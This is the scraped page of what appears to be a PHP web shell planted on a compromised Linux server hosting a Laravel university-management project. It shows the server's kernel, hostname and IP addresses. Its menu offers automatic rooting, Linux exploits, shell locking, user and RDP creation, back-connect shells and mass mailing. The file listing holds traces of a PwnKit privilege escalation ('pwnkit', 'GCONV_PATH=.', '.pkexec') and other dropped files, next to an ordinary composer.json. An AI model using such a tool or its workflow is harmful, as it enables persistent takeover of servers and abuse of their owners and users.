Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.78
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo10.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxr-xr-x
.git
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
1xrmnhy
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cavolbz
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
efcon1w
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
kwrp1cx
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
vfmjdqt
[ DIR ]
drwxr-xr-x
vglfbas
[ DIR ]
drwxr-xr-x
yax1onu
[ DIR ]
drwxr-xr-x
z1fwyra
[ DIR ]
drwxr-xr-x
.env
784
B
-rw-rw-rw-
.env.example
638
B
-rw-rw-rw-
.htaccess
1.96
KB
-r--r--r--
.mad-root
0
B
-rw-r--r--
README.md
3.07
KB
-rw-rw-rw-
artisan
339
B
-rw-rw-rw-
composer-setup.php
58.13
KB
-rw-rw-rw-
composer.json
1.33
KB
-rw-rw-rw-
composer.lock
470.2
KB
-rw-rw-rw-
composer.phar
3.47
MB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
index.php
19.47
KB
-r--r--r--
license-dhzn.php
629
B
-rw-r--r--
phpunit.xml.dist
1.11
KB
-rw-rw-rw-
prd.md
31.76
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
86
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "samir/university-management-system", "description": "Laravel University Management System scaffold based on the PRD.", "type": "project", "require": { "php": "^8.2", "laravel/framework": "^12.0", "livewire/livewire": "^3.0", "filament/filament": "^4.0", "spatie/laravel-permission": "^6.0", "laravel/cashier": "^16.0", "srmklive/paypal": "^3.0", "maatwebsite/excel": "^3.1", "barryvdh/laravel-dompdf": "^3.0" }, "require-dev": { "fakerphp/faker": "^1.24", "larastan/larastan": "^3.0", "laravel/pint": "^1.0", "mockery/mockery": "^1.6", "pestphp/pest": "^3.0", "pestphp/pest-plugin-laravel": "^3.0" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "test": "php artisan test" }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true } }, "minimum-stability": "stable", "prefer-stable": true }
Close